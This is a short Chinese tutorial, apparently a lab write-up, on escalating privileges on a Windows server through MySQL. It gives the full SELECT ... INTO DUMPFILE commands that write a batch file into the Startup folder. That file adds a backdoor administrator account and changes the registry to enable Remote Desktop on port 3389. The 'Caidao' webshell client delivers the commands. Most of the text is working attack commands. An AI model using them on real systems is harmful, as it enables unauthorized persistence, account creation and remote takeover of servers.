开机启动项提权原理：利用mysql，将后门写入开机自启动项。同时因为是开机自启动，再写入之后，需要重启目标服务器。(这个要求mysql的权限就很高，至少是管理员权限甚至是system)

实验环境

• Windows Server 2008 R2 x64
• MySQL-5.5.15-(64-bit).msi
• 菜刀

模拟实验

在菜刀中输入select "net user zs 123.com /add & net localgroup Administrators zs /add" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"执行
然后双击启动中出现的文件，这时用户创建成功并且是管理员组

也可输入select "net user zs 123.com /add & net localgroup Administrators zs /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal' 'Server /v fDenyTSConnections /t REG_DWORD /d 0 /f" into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"同时开启3389端口

这时就可以用桌面远程连接了

C:\Documents and Settings\Administrator\「开始」菜单\程序\启动\（windows2003及xp的路径）